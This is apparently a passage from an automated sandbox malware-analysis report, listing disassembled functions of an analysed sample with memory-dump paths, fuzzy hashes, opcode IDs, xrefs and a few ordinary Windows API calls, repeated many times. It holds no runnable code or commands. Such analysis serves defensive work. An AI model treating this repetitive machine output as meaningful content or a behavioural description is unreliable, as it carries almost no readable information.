Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: $^y?$0jms$uVI?
API String ID: 0-760835618
Opcode ID: 90ac280d1e2bf7143276b6980c52f255e39f90f007811904bed44d3d5ef0b912
Instruction ID: 1847c04226ced947548d313b04f629abeb498927e38187c91a20fb93b7fbdf63
Opcode Fuzzy Hash: 90ac280d1e2bf7143276b6980c52f255e39f90f007811904bed44d3d5ef0b912
Instruction Fuzzy Hash: 6DB2C1F260C210AFE304AE2DEC8567AFBE9EF94720F16493DE6C583740E67558408797

Function 0075A973 Relevance: 5.2, Strings: 4, Instructions: 225COMMON

Download Yara Rule

Strings

}=k, xrefs: 0075AB0A
Gww, xrefs: 0075A9A3
XH~6, xrefs: 0075AB97
XH~6, xrefs: 0075AB92

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: XH~6$XH~6$}=k$Gww
API String ID: 0-1080222654
Opcode ID: dc9322e1a1e403ac6b44e763c044442d610931828cb7e3583c6d6fcd2adf96ce
Instruction ID: 0cfc42f56783b7aaca09225324424686d9cd849ee2a281b7a2f5b63c9e04c73e
Opcode Fuzzy Hash: dc9322e1a1e403ac6b44e763c044442d610931828cb7e3583c6d6fcd2adf96ce
Instruction Fuzzy Hash: DC612DF3B182009FF3045E69DC8677AB7D9EB94330F1A493DEAC8C7780D97998118692

Function 6C5C6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C5C6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5C6E1E

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: 30fdd8a27012fde01093a4fe5b2a470100592cc6e4e84b6bb2427cdc3db51dc0
Instruction ID: a0a963fa388b19a6b1f5892642ce925261fd1fb7eca3ccaa11930979fdf5e492
Opcode Fuzzy Hash: 30fdd8a27012fde01093a4fe5b2a470100592cc6e4e84b6bb2427cdc3db51dc0
Instruction Fuzzy Hash: 96A16B74618381CFDB14CF24C890BAABBF2BFC9308F45491DE48A97751DB70A949CB92

Function 003D3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(003DE118,00000000,00000001,003DE108,00000000), ref: 003D3758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003D37B0

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 08b698af32dd10722079e004873c2c5ba35c0e97569e6e9e2e916967b5512ad2
Instruction ID: 6395fc028ab6cd62208f359ae4c8c1884b9db453d565e30c714e5f80f34f05a0
Opcode Fuzzy Hash: 08b698af32dd10722079e004873c2c5ba35c0e97569e6e9e2e916967b5512ad2
Instruction Fuzzy Hash: 21411871A40A289FDB24DB58DC94B9BB7B5BB48302F4081D9E608EB2D0D7716E85CF50

Function 0078C1BE Relevance: 2.0, Strings: 1, Instructions: 778COMMON

Download Yara Rule

Strings

Bas, xrefs: 0078C38F

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Bas
API String ID: 0-1688933157
Opcode ID: d0681774cb07b9db85b0ec06bb406f5dca27165104d0c9ba2a6900da35c9ddad
Instruction ID: c134e5f08c4381cc326702ece5d21a1f7f86a0de46c362fe18c2c5550948cc8a
Opcode Fuzzy Hash: d0681774cb07b9db85b0ec06bb406f5dca27165104d0c9ba2a6900da35c9ddad
Instruction Fuzzy Hash: 9D3236F360C2049FE705AE2DEC85A7ABBE9EF94320F16453DE6C4C7744EA3658018697

Function 6C5C5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C594A63,?,?), ref: 6C5C5F06

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: ff99ed97120ed6323c5b8ec8dcd4d62f0621b680e5646f51ffa0735ea4722438
Instruction ID: c2b49e209a1fc1a392c7c84611ad62a0c56f54f297019d85abd175c01e2f3cb1
Opcode Fuzzy Hash: ff99ed97120ed6323c5b8ec8dcd4d62f0621b680e5646f51ffa0735ea4722438
Instruction Fuzzy Hash: 3CC1B175E012098BCB08CFD5C9906EEBBB2FF89318FA8415DD8556BB44D732A906CF91

Function 0063AC44 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

D ~}, xrefs: 0063AE75

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: D ~}
API String ID: 0-2457276271
Opcode ID: 5c814cf768eb9e99b8eb67e9478592ebede82d0dc2edfd3916dba7550fec583b
Instruction ID: bf283b6b702b6a5454910445eee705b2b2dfa0b6435a4f057e91ab6d821419c3
Opcode Fuzzy Hash: 5c814cf768eb9e99b8eb67e9478592ebede82d0dc2edfd3916dba7550fec583b
Instruction Fuzzy Hash: 0A6166B3A0C2009BE3046E2DDD947BAF7E9EB94324F27463DDBC597B80E93558018792

Function 0072B04B Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

XC0,, xrefs: 0072B27A

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: XC0,
API String ID: 0-2965344728
Opcode ID: b04bcc66e5d2ba2d401fcaf760e1f5e83bc461659943aa31318c2a86bfff9289
Instruction ID: 77271137191b599f2ee66868531785fcc8496a0820ed1a5815aa037442b481dc
Opcode Fuzzy Hash: b04bcc66e5d2ba2d401fcaf760e1f5e83bc461659943aa31318c2a86bfff9289
Instruction Fuzzy Hash: 435159F3A083049FF7086A39EC893BAB6D5EB94324F1A463DDBC5D37C0E53958058296

Function 006FFF3A Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

Lm~, xrefs: 0070015F

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Lm~
API String ID: 0-2600465566
Opcode ID: b5f7768083abd4f75ef034ca69394647c0dfe88df93d2eb5c4f7dd627505c4e6
Instruction ID: 3e2baaef60554a8a98e874daf0db43224489a4b046d9b19a81ad6d8f94de6df9
Opcode Fuzzy Hash: b5f7768083abd4f75ef034ca69394647c0dfe88df93d2eb5c4f7dd627505c4e6
Instruction Fuzzy Hash: 3451F8F3A0C2049BE318BA7CED5577A7BD9DB54320F16463DEAC8D3784F93958054286

Function 00666DF6 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

Bg!o, xrefs: 00666E60

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

